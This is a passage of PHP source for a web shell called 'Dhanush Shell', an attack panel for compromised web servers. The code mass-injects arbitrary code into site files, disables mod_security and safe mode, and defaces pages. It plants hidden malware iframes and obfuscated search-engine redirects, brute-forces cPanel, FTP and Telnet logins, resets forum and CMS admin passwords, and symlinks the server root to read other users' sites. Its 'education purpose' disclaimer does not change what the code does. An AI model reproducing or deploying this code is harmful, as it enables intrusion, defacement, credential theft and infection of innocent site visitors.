1222                     <tr align="center">
1223                     <td class="myfun"><a href="<?php echo $self.'?database'?>"><font class="fun">[SQL]</font></a></td>
1224                     <td class="myfun"><a href="<?php echo $self.'?404'?>"><font class="fun">[404 Page]</font></a></td>
1225                     <td class="myfun"><a href="<?php echo $self.'?malattack&dir='. $dir;?>"><font class="fun">[Malware Attack]</a></td>
1226                     <td class="myfun"><a href="<?php echo $self.'?cpanel'?>"><font class="fun">[Cpanel Cracker]</font></a></td>
1227                     <td class="myfun"><a href="<?php echo $self.'?about'?>"><font class="fun">[About]</font></a></td>
1228                     <td class="myfun"><a href="<?php echo $self.'?selfkill'?>" onClick="if(confirm('Are You Sure You Want To Kill This Shell ?')){return true;}else{return false;}"><font class="fun">[SelfKill]</font></a></td>
1229                     <td class="myfun"><a href="<?php echo $self.'?logout'?>"><font class="fun">[LogOut]</font></a></td>
1230                     </tr>
1231                     </table>
1232                     
1233                     <table align="center" class="pwdtbl"><br>
1234                     <tr>
1235                     <form method="GET"  action="<?php echo $self; ?>">
1236                     <td style="width:35%;" align="right"> Present Working Directory : </td><td style="width:20%;"><input name="dir" class="box" style="width:300px;" value="<?php if($dir == null){echo getcwd();} else { echo $dir; } ?>"/></td>
1237                     <td><input type="submit" value="  Go  " class="but" /></td><td align="right"><?php if($os == "Linux") { ?>
1238                     <a href="<?php echo $self.'?downloadit'; ?>"><font class="txt">Download It</font></a><?php } ?></td>
1239                     </form>
1240                     </tr>
1241                     </table>
1242                     
1243                     <?php
1244                     
1245                     if(isset($_POST['pathtomass']) &&  $_POST['pathtomass'] != '' &&  isset($_POST['filetype']) &&  $_POST['filetype'] != '' &&  isset($_POST['mode']) &&  $_POST['mode'] != '' && isset($_POST['injectthis']) &&  $_POST['injectthis'] != '')
1246                     {
1247                     //$dir = $_GET['dir'];
1248                     $filetype = $_POST['filetype'];
1249                     //$message = $_GET['message'];
1250                     
1251                     $mode = "a"; //default mode
1252                     
1253                     
1254                     // Modes Begin
1255                     
1256                     if($_POST['mode'] == 'Apender')
1257                     {
1258                     $mode = "a";
1259                     }
1260                     if($_POST['mode'] == 'Overwriter')
1261                     {
1262                     $mode = "w";
1263                     }
1264                     
1265                     if ($_POST['filetype'] == 'php')
1266                     {
1267                     if (is_dir($_POST['pathtomass']))
1268                     {
1269                     $lolinject = $_POST['injectthis'];
1270                     foreach (glob($_POST['pathtomass'] . $directorysperator . "*.php") as $injectj00)
1271                     {
1272                     $fp=fopen($injectj00,$mode);
1273                     if (fputs($fp,$lolinject)){
1274                     echo '<br><font class=txt>'.$injectj00.' was injected<br></font>';
1275                     } else {
1276                     echo 'failed to inject '.$injectj00.'';
1277                     }
1278                     }
1279                     } else
1280                     { //end if inputted dir is real -- if not, show an ugly red error
1281                     echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
1282                     } // end if inputted dir is real, for real this time
1283                     } // end if confirmation to mass sploit is php only
1284                     } // end if massbrowsersploit is called
1285                     
1286                     if(isset($_GET['set404']))
1287                     {
1288                     echo "<center><blink><font color=lime>Done setting 404 Page</font></blink></center>";
1289                     }
1290                     if(isset($_GET['cannotset404']))
1291                     {
1292                     echo "<center><blink><font color=red>Cannot Set 404 Page</font></blink></center>";
1293                     }
1294                     
1295                     if(isset($_GET['to']) && isset($_GET['file']))
1296                     {
1297                     if(!rename($_GET['file'], $_GET['to']))
1298                     {
1299                     $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1300                     header("Location:$loc");
1301                     ob_end_flush();
1302                     
1303                     }
1304                     else
1305                     {
1306                     $loc = $_SERVER["SCRIPT_NAME"] . "?dir=" . $_GET['getdir'];
1307                     header("Location:$loc");
1308                     ob_end_flush();
1309                     
1310                     }
1311                     }
1312                     
1313                     
1314                     if(isset($_POST["changeperms"]))
1315                     {
1316                     if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
1317                     {
1318                     $perms = 0;
1319                     for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
1320                     $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
1321                     if(@chmod($_POST['myfilename'],$perms))
1322                     echo "<center><blink><font size=3>File Permissions Changed Successfully</font></blink></center>";
1323                     else
1324                     echo "<center><blink><font size=3 class=txt>Cannot Change File Permissions</font></blink></center>";
1325                     }
1326                     }
1327                     
1328                     $setuploadvalue = 0;
1329                     if(isset($_POST['u']))
1330                     {
1331                     $path = $_REQUEST['path'];
1332                     if(is_dir($path))
1333                     {
1334                     $uploadedFilePath = $_FILES['uploadfile']['name'];
1335                     //echo $uploadedFilePath;
1336                     $tempName = $_FILES['uploadfile']['tmp_name'];
1337                     //echo $tempName;
1338                     if($os == "Windows")
1339                     $uploadPath = $path . $directorysperator .  $uploadedFilePath;
1340                     else if($os == "Linux")
1341                     $uploadPath = $path . $directorysperator . $uploadedFilePath;
1342                     if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
1343                     {
1344                     echo "<center><font class=txt size=3><blink>File uploaded to $uploadPath</blink></font></center>";
1345                     //header("Location:");
1346                     }
1347                     else
1348                     {
1349                     echo "<center><font size=3><blink>Failed to upload file to $uploadPath</blink></font></center>";
1350                     }
1351                     }
1352                     }
1353                     
1354                     if(isset($_POST['createdir']))
1355                     {
1356                     if(!mkdir($_POST['createfolder']))
1357                     echo "Failed To create";
1358                     }
1359                     if(isset($_POST['createmyfile'])&&isset($_POST['filecontent']))
1360                     {
1361                     $content = $_POST['filecontent'];
1362                     $file_pointer = fopen($_POST['filecreator'], "w+");
1363                     fwrite($file_pointer, $content);
1364                     fclose($file_pointer);
1365                     $loc = $_SERVER['REQUEST_URI'];
1366                     header("Location:$loc");
1367                     ob_end_flush();
1368                     }
1369                     
1370                     
1371                     //Turn Safe Mode Off
1372                     
1373                     if(getDisabledFunctions() != "None" || safe() != "OFF")
1374                     {
1375                     $file_pointer = fopen(".htaccess", "w+");
1376                     fwrite($file_pointer, "<IfModule mod_security.c>
1377                     SecFilterEngine Off
1378                     SecFilterScanPOST Off
1379                     </IfModule>");
1380                     
1381                     $file_pointer = fopen("ini.php", "w+");
1382                     fwrite($file_pointer, "<?
1383                     echo ini_get(\"safe_mode\");
1384                     echo ini_get(\"open_basedir\");
1385                     include(\$_GET[\"file\"]);
1386                     ini_restore(\"safe_mode\");
1387                     ini_restore(\"open_basedir\");
1388                     echo ini_get(\"safe_mode\");
1389                     echo ini_get(\"open_basedir\");
1390                     include(\$_GET[\"ss\"]);
1391                     ?>");
1392                     
1393                     $file_pointer = fopen("php.ini", "w+");
1394                     fwrite($file_pointer, "safe_mode               =       Off");
1395                     
1396                     fclose($file_pointer);
1397                     //echo "Safe Mode Is Now Off..";
1398                     }
1399                     
1400                     if(isset($_GET["downloadit"]))
1401                     {
1402                     $FolderToCompress = getcwd();
1403                     execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
1404                     
1405                     $prd=explode("/","backup.tar");
1406                     for($i=0;$i<sizeof($prd);$i++)
1407                     {
1408                     $nfd=$prd[$i];
1409                     }
1410                     @ob_clean();
1411                     header("Content-type: application/octet-stream");
1412                     header("Content-length: ".filesize($nfd));
1413                     header("Content-disposition: attachment; filename=\"".$nfd."\";");
1414                     readfile($nfd);
1415                     
1416                     exit;
1417                     }
1418                     
1419                     if(isset($_POST['uploadurl']))
1420                     {
1421                     $functiontype = trim($_POST['functiontype']);
1422                     $wurl = trim($_POST['wurl']);
1423                     $path = magicboom($_POST['path']);
1424                     $namafile = remotedownload($functiontype,$wurl);
1425                     $fullpath = $path . $directorysperator . $namafile;
1426                     if(is_file($fullpath))
1427                     {
1428                     echo "<center><font class=txt size=3>File uploaded to $fullpath</font></center>";
1429                     }
1430                     else
1431                     echo "<center><font size=3>Failed to upload $namafile</font></center>";
1432                     }
1433                     
1434                     else if(isset($_GET['about']))
1435                     { ?>
1436                     <bR><center>
1437                     <p><font size=6><u>D h a n u s h</u></font><br>
1438                     <font size=5>[--==Coded By Arjun==--]</font><br>
1439                     <br><div style='font-family: Courier New; font-size: 10px;'><pre>
1440                     
1441                     -  --  -
1442                     -- -- --
1443                     --    --
1444                     ---  ---
1445                     ------
1446                     ----
1447                     ----
1448                     ------
1449                     -------
1450                     ---   --
1451                     --      ---
1452                     --      -----
1453                     ---      --- ---
1454                     ---    ---   ---
1455                     --   ---------     --
1456                     --    -------      --
1457                     --     ----       --
1458                     --     ---       --
1459                     
1460                     --     --        --
1461                     ---  ---   --  ---
1462                     ------    ------
1463                     ----      ----
1464                     
1465                     
1466                     </pre></div></center>
1467                     Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it<br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| &#2332;&#2351; &#2350;&#2361;&#2366;&#2325;&#2366;&#2354; | | &#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342; |</font></center><br>
1468                     <?php }
1469                     
1470                     // Zone-h Poster
1471                     else if(isset($_GET["zone"]))
1472                     {
1473                     if(!function_exists('curl_version'))
1474                     {
1475                     echo "<pre class=ml1 style='margin-top:5px'><center><font class=txt>PHP CURL NOT EXIT</font></center></pre>";
1476                     }
1477                     ?>
1478                     <center><font size="4">Zone-h Poster</font></center>
1479                     <form action="<?php echo $self; ?>" method="post">
1480                     <table align="center" cellpadding="5" border="0">
1481                     <tr>
1482                     <td>
1483                     <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
1484                     <tr><td>
1485                     <select name="hackmode" class="box">
1486                     <option >--------SELECT--------</option>
1487                     <option value="1">known vulnerability (i.e. unpatched system)</option>
1488                     <option value="2" >undisclosed (new) vulnerability</option>
1489                     <option value="3" >configuration / admin. mistake</option>
1490                     <option value="4" >brute force attack</option>
1491                     <option value="5" >social engineering</option>
1492                     <option value="6" >Web Server intrusion</option>
1493                     <option value="7" >Web Server external module intrusion</option>
1494                     <option value="8" >Mail Server intrusion</option>
1495                     <option value="9" >FTP Server intrusion</option>
1496                     <option value="10" >SSH Server intrusion</option>
1497                     <option value="11" >Telnet Server intrusion</option>
1498                     <option value="12" >RPC Server intrusion</option>
1499                     <option value="13" >Shares misconfiguration</option>
1500                     <option value="14" >Other Server intrusion</option>
1501                     <option value="15" >SQL Injection</option>
1502                     <option value="16" >URL Poisoning</option>
1503                     <option value="17" >File Inclusion</option>
1504                     <option value="18" >Other Web Application bug</option>
1505                     <option value="19" >Remote administrative panel access bruteforcing</option>
1506                     <option value="20" >Remote administrative panel access password guessing</option>
1507                     <option value="21" >Remote administrative panel access social engineering</option>
1508                     <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1509                     <option value="23" >Access credentials through Man In the Middle attack</option>
1510                     <option value="24" >Remote service password guessing</option>
1511                     <option value="25" >Remote service password bruteforce</option>
1512                     <option value="26" >Rerouting after attacking the Firewall</option>
1513                     <option value="27" >Rerouting after attacking the Router</option>
1514                     <option value="28" >DNS attack through social engineering</option>
1515                     <option value="29" >DNS attack through cache poisoning</option>
1516                     <option value="30" >Not available</option>
1517                     </select>
1518                     </td></tr>
1519                     <tr><td>
1520                     <select name="reason" class="box">
1521                     <option >--------SELECT--------</option>
1522                     <option value="1" >Heh...just for fun!</option>
1523                     <option value="2" >Revenge against that website</option>
1524                     <option value="3" >Political reasons</option>
1525                     <option value="4" >As a challenge</option>
1526                     <option value="5" >I just want to be the best defacer</option>
1527                     <option value="6" >Patriotism</option>
1528                     <option value="7" >Not available</option>
1529                     </select></td></tr>
1530                     <tr><td>
1531                     <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
1532                     <tr><td>
1533                     <input type="submit" class="but" value="Send Now !" name="SendNowToZoneH" /></td></tr></table>
1534                     </form>
1535                     <?php }
1536                     
1537                     // Deface Website
1538                     else if(isset($_GET['deface']))
1539                     {
1540                     $myfile = fopen($_GET['deface'],'w');
1541                     fwrite($myfile, base64_decode($ind));
1542                     fclose($myfile);
1543                     header("Location:$self");
1544                     ob_end_flush();
1545                     }
1546                     
1547                     // Cpanel Cracker
1548                     else if(isset($_REQUEST['cpanel']))
1549                     {
1550                     $cpanel_port="2082";
1551                     $connect_timeout=5;
1552                     if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
1553                     {
1554                     ?>
1555                     <center>
1556                     <form method=post>
1557                     <table style="width:50%;" border=1 cellpadding=4>
1558                     <tr>
1559                     <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
1560                     </tr>
1561                     <tr>
1562                     <td align=center>User names</td><td align=center>Password</td>
1563                     </tr>
1564                     <tr>
1565                     <td align=center><textarea name=username rows=25 cols=22 class=box><?php
1566                     if($os != "Windows")
1567                     {
1568                     if(@file('/etc/passwd'))
1569                     {
1570                     $users = file('/etc/passwd');
1571                     foreach($users as $user)
1572                     {
1573                     $user = explode(':', $user);
1574                     echo $user[0] . "
1575                     ";
1576                     }
1577                     }
1578                     else
1579                     {
1580                     $temp = "";
1581                     $val1 = 0;
1582                     $val2 = 1000;
1583                     for(;$val1 <= $val2;$val1++)
1584                     {
1585                     $uid = @posix_getpwuid($val1);
1586                     if ($uid)
1587                     $temp .= join(':',$uid)."
1588                     ";
1589                     }
1590                     
1591                     $temp = trim($temp);
1592                     
1593                     if($file5 = fopen("test.txt","w"))
1594                     {
1595                     fputs($file5,$temp);
1596                     fclose($file5);
1597                     
1598                     $file = fopen("test.txt", "r");
1599                     while(!feof($file))
1600                     {
1601                     $s = fgets($file);
1602                     $matches = array();
1603                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1604                     $matches = str_replace("home/","",$matches[1]);
1605                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1606                     continue;
1607                     echo $matches;
1608                     }
1609                     fclose($file);
1610                     }
1611                     }
1612                     }
1613                     ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
1614                     </tr>
1615                     <tr>
1616                     <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
1617                     </tr>
1618                     <tr>
1619                     <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
1620                     </tr>
1621                     <tr>
1622                     <td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
1623                     </tr>
1624                     </table>
1625                     </form>
1626                     </center>
1627                     <?php
1628                     }
1629                     else
1630                     {
1631                     if(empty($_POST['username']) || empty($_POST['password']))
1632                     echo "<center>Please Enter The Users or Password List</center>";
1633                     else
1634                     {
1635                     $userlist=explode("
1636                     ",$_POST['username']);
1637                     $passlist=explode("
1638                     ",$_POST['password']);
1639                     
1640                     if($_POST['cracktype'] == "ftp")
1641                     {
1642                     foreach ($userlist as $user)
1643                     {
1644                     $pureuser = trim($user);
1645                     foreach ($passlist as $password )
1646                     {
1647                     $purepass = trim($password);
1648                     ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
1649                     }
1650                     }
1651                     }
1652                     if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
1653                     {
1654                     if($cracktype == "telnet")
1655                     {
1656                     $cpanel_port="23";
1657                     }
1658                     else
1659                     $cpanel_port="2082";
1660                     foreach ($userlist as $user)
1661                     {
1662                     $pureuser = trim($user);
1663                     echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
1664                     Processing user $pureuser ...</font></b><br><br>";
1665                     foreach ($passlist as $password )
1666                     {
1667                     $purepass = trim($password);
1668                     cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
1669                     }
1670                     }
1671                     }
1672                     }
1673                     }
1674                     }
1675                     
1676                     // Deface Website
1677                     else if(isset($_REQUEST['malattack']))
1678                     {
1679                     ?>
1680                     <center><table><tr><td><a href="<?php echo $self; ?>?malattack&malware&dir=<?php echo $_GET['dir']; ?>"><font size="4">| Malware Attack |</font></a></td>
1681                     <td><a href="<?php echo $self; ?>?malattack&codeinsert&dir=<?php echo $_GET['dir']; ?>"><font size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
1682                     <?php
1683                     if(isset($_GET['malware']))
1684                     {
1685                     ?>
1686                     <center><table><tr><td><a href="<?php echo $self; ?>?malattack&malware&infect&dir=<?php echo $_GET['dir']; ?>"><font size="4">| Infect Users |</font></a></td>
1687                     <td><a href="<?php echo $self; ?>?malattack&malware&redirect&dir=<?php echo $_GET['dir']; ?>"><font size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
1688                     <?php
1689                     if(isset($_GET['redirect']))
1690                     {
1691                     if($myfile = fopen(".htaccess",'a'))
1692                     {
1693                     $mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
1694                     fwrite($myfile, gzuncompress(base64_decode($mal)));
1695                     fwrite($myfile, "
1696                     ");
1697                     fclose($myfile);
1698                     $mydir = "dir=".$_GET['dir'];
1699                     header("Location:$self?malattack&$mydir");
1700                     ob_end_flush();
1701                     }
1702                     else
1703                     echo "<center>Cannot open file !!!!<center>";
1704                     }
1705                     else if(isset($_GET['infect']))
1706                     {
1707                     $coun = 0;
1708                     $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
1709                     foreach (glob($_GET['dir'] . $directorysperator . "*.php") as $injectj00)
1710                     {
1711                     if($myfile=fopen($injectj00,'a'))
1712                     {
1713                     fputs($myfile, $str);
1714                     fclose($myfile);
1715                     }
1716                     else
1717                     $coun = 1;
1718                     }
1719                     foreach (glob($_GET['dir'] . $directorysperator . "*.htm") as $injectj00)
1720                     {
1721                     if($myfile=fopen($injectj00,'a'))
1722                     {
1723                     fputs($myfile, $str);
1724                     fclose($myfile);
1725                     }
1726                     else
1727                     $coun = 1;
1728                     }
1729                     foreach (glob($_GET['dir'] . $directorysperator . "*.html") as $injectj00)
1730                     {
1731                     if($myfile=fopen($injectj00,'a'))
1732                     {
1733                     fputs($myfile, $str);
1734                     fclose($myfile);
1735                     }
1736                     else
1737                     $coun = 1;
1738                     }
1739                     
1740                     if($coun == 0)
1741                     echo "<center>Done !!!!<center>";
1742                     else
1743                     echo "<center>Cannot open files !!!!<center>";
1744                     }
1745                     }
1746                     else if(isset($_GET['codeinsert']))
1747                     {
1748                     if(!isset($_POST['code']))
1749                     {
1750                     if($file1 = fopen(".htaccess",'r'))
1751                     { ?>
1752                     <form method=post>
1753                     <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
1754                     <input type="submit" value="  Insert  " class=but>
1755                     </form>
1756                     <?php   }
1757                     else
1758                     echo "<center>Cannot Open File!!</center>";
1759                     }else
1760                     {
1761                     if($myfile = fopen(".htaccess",'a'))
1762                     {
1763                     fwrite($myfile, $_POST['code']);
1764                     fwrite($myfile, "
1765                     ");
1766                     fclose($myfile);
1767                     header("Location:$self?malattack");
1768                     ob_end_flush();
1769                     }
1770                     else
1771                     echo "Permission Denied";
1772                     }
1773                     }
1774                     }
1775                     
1776                     // Password Change Forums
1777                     else if(isset($_POST['forumpass']))
1778                     {
1779                     $localhost =  $_POST['f1'];
1780                     $database =  $_POST['f2'];
1781                     $username =  $_POST['f3'];
1782                     $password =  $_POST['f4'];
1783                     $prefix    =  $_POST['prefix'];
1784                     $uid = $_POST['uid'];
1785                     $newpass = $_POST['newpass'];
1786                     if($_POST['forums'] == "vb")
1787                     {
1788                     $con = mysql_connect($localhost,$username,$password);
1789                     $db = mysql_select_db($database,$con);
1790                     $salt = "eghjghrtd";
1791                     $newpassword = md5(md5($newpass) . $salt);
1792                     if($prefix == "" || $prefix == null)
1793                     $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1794                     else
1795                     $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'");
1796                     if($sql)
1797                     {
1798                     mysql_close($con);
1799                     header("Location:$self?forum&passwordchange&changed");
1800                     ob_end_flush();
1801                     }
1802                     else
1803                     header("Location:$self?forum&passwordchange&cannotchange");
1804                     }
1805                     if($_POST['forums'] == "mybb")
1806                     {
1807                     $con = mysql_connect($localhost,$username,$password);
1808                     $db = mysql_select_db($database,$con);
1809                     $salt = "jeghj";
1810                     $newpassword = md5(md5($salt).$newpass);
1811                     if($prefix == "" || $prefix == null)
1812                     $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1813                     else
1814                     $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'");
1815                     if($sql)
1816                     {
1817                     mysql_close($con);
1818                     header("Location:$self?forum&passwordchange&changed");
1819                     ob_end_flush();
1820                     }
1821                     else
1822                     header("Location:$self?forum&passwordchange&cannotchange");
1823                     }
1824                     if($_POST['forums'] == "smf")
1825                     {
1826                     $con = mysql_connect($localhost,$username,$password);
1827                     $db = mysql_select_db($database,$con);
1828                     $salt = "eghj";
1829                     
1830                     if($prefix == "" || $prefix == null)
1831                     {
1832                     $result = mysql_query("select member_name from smf_members where id_member = 1");
1833                     $row = mysql_fetch_array($result);
1834                     $membername = $row['member_name'];
1835                     $newpassword = sha1(strtolower($membername).$newpass);
1836                     $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'");
1837                     }
1838                     else
1839                     {
1840                     $result = mysql_query("select member_name from ".$prefix."members where id_member = 1");
1841                     $row = mysql_fetch_array($result);
1842                     $membername = $row['member_name'];
1843                     $newpassword = sha1(strtolower($membername).$newpass);
1844                     $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'");
1845                     }
1846                     if($sql)
1847                     {
1848                     mysql_close($con);
1849                     header("Location:$self?forum&passwordchange&changed");
1850                     ob_end_flush();
1851                     }
1852                     else
1853                     header("Location:$self?forum&passwordchange&cannotchange");
1854                     }
1855                     if($_POST['forums'] == "phpbb")
1856                     {
1857                     $con = mysql_connect($localhost,$username,$password);
1858                     $db = mysql_select_db($database,$con);
1859                     
1860                     $newpassword = md5($newpass);echo $newpassword;
1861                     if(empty($prefix) || $prefix == null)
1862                     $sql = mysql_query("update phpbb_users set user_password = '$newpassword' where user_id = '$uid'");
1863                     else
1864                     $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'");
1865                     if($sql)
1866                     {
1867                     mysql_close($con);
1868                     header("Location:$self?forum&passwordchange&changed");
1869                     ob_end_flush();
1870                     }
1871                     else
1872                     header("Location:$self?forum&passwordchange&cannotchange");
1873                     }
1874                     if($_POST['forums'] == "ipb")
1875                     {
1876                     $con = mysql_connect($localhost,$username,$password);
1877                     $db = mysql_select_db($database,$con);
1878                     $salt = "eghj";
1879                     $newpassword = md5(md5($salt).md5($newpass));
1880                     if($prefix == "" || $prefix == null)
1881                     $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1882                     else
1883                     $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'");
1884                     if($sql)
1885                     {
1886                     mysql_close($con);
1887                     header("Location:$self?forum&passwordchange&changed");
1888                     ob_end_flush();
1889                     }
1890                     else
1891                     header("Location:$self?forum&passwordchange&cannotchange");
1892                     }
1893                     if($_POST['forums'] == "wp")
1894                     {
1895                     $uname = $_POST['uname'];
1896                     $con = mysql_connect($localhost,$username,$password);
1897                     $db = mysql_select_db($database,$con);
1898                     
1899                     $newpassword = md5($newpass);
1900                     if($prefix == "" || $prefix == null)
1901                     $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1902                     else
1903                     $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'");
1904                     if($sql)
1905                     {
1906                     mysql_close($con);
1907                     header("Location:$self?forum&passwordchange&changed#wordp");
1908                     ob_end_flush();
1909                     }
1910                     else
1911                     header("Location:$self?forum&passwordchange&cannotchange#wordp");
1912                     }
1913                     if($_POST['forums'] == "joomla")
1914                     {
1915                     $uname = $_POST['uname'];
1916                     $con = mysql_connect($localhost,$username,$password);
1917                     $db = mysql_select_db($database,$con);
1918                     
1919                     $newpassword = md5($newpass);
1920                     if($prefix == "" || $prefix == null)
1921                     $sql = mysql_query("update jos_users set password = '$newpassword', username = '$uname' where name = 'Super User'");
1922                     else
1923                     $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$uname' where name = 'Super User' OR name = 'Administrator'");
1924                     if($sql)
1925                     {
1926                     mysql_close($con);
1927                     header("Location:$self?forum&passwordchange&changed#jooml");
1928                     ob_end_flush();
1929                     }
1930                     else
1931                     header("Location:$self?forum&passwordchange&cannotchange#jooml");
1932                     }
1933                     }
1934                     
1935                     else if(isset($_GET['whois']))
1936                     {
1937                     echo "<br>".nl2br(shell_exec("whois ".$_GET['whois']))."";
1938                     }
1939                     
1940                     // Get Domains
1941                     else if(isset($_REQUEST["symlinkserver"]))
1942                     {
1943                     ?>
1944                     <center><table><tr><td><a href="<?php echo $self; ?>?domains&symlinkserver">| Get Domains |</a></td>
1945                     <td><a href="<?php echo $self; ?>?symlink&symlinkserver">| Symlink Server |</a></td>
1946                     <td><a href="<?php echo $self; ?>?symlinkfile&symlinkserver">| Symlink File |</a></td>
1947                     <td><a href="<?php echo $self; ?>?script&symlinkserver">| Script Locator |</a></td>
1948                     </tr></table></center><br>
1949                     <?php
1950                     if(isset($_GET["domains"]))
1951                     {
1952                     ?> <center><iframe src="<?php echo 'http://sameip.org/ip/' . getenv('SERVER_ADDR'); ?>" width="80%" height="1000px"></iframe></center>
1953                     <?php }
1954                     else if(isset($_GET["symlink"]))
1955                     {
1956                     $d0mains = @file("/etc/named.conf");
1957                     
1958                     if($d0mains)
1959                     {
1960                     @mkdir("dhanush",0777);
1961                     @chdir("dhanush");
1962                     execmd("ln -s / root");
1963                     $file3 = 'Options all
1964                     DirectoryIndex Sux.html
1965                     AddType text/plain .php
1966                     AddHandler server-parsed .php
1967                     AddType text/plain .html
1968                     AddHandler txt .html
1969                     Require None
1970                     Satisfy Any
1971                     ';
1972                     $fp3 = fopen('.htaccess','w');
1973                     $fw3 = fwrite($fp3,$file3);
1974                     @fclose($fp3);
1975                     echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td><td align=center><font size=3>Information</font></td></tr>";
1976                     
1977                     $dcount = 1;
1978                     foreach($d0mains as $d0main)
1979                     {
1980                     if(eregi("zone",$d0main))
1981                     {
1982                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
1983                     flush();
1984                     
1985                     if(strlen(trim($domains[1][0])) > 2)
1986                     {
1987                     $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1988                     
1989                     echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/dhanush/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td><td><a href=?whois=".$domains[1][0]." target=_blank>info</a></td></tr>"; flush();
1990                     $dcount++;
1991                     }
1992                     }
1993                     }
1994                     echo "</table>";
1995                     }
1996                     else
1997                     {
1998                     $TEST=@file('/etc/passwd');
1999                     if ($TEST)
2000                     {
2001                     @mkdir("dhanush",0777);
2002                     @chdir("dhanush");
2003                     execmd("ln -s / root");
2004                     $file3 = 'Options all
2005                     DirectoryIndex Sux.html
2006                     AddType text/plain .php
2007                     AddHandler server-parsed .php
2008                     AddType text/plain .html
2009                     AddHandler txt .html
2010                     Require None
2011                     Satisfy Any
2012                     ';
2013                     $fp3 = fopen('.htaccess','w');
2014                     $fw3 = fwrite($fp3,$file3);
2015                     @fclose($fp3);
2016                     
2017                     echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";
2018                     
2019                     $dcount = 1;
2020                     $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2021                     //Output a line of the file until the end is reached
2022                     while(!feof($file))
2023                     {
2024                     $s = fgets($file);
2025                     $matches = array();
2026                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2027                     $matches = str_replace("home/","",$matches[1]);
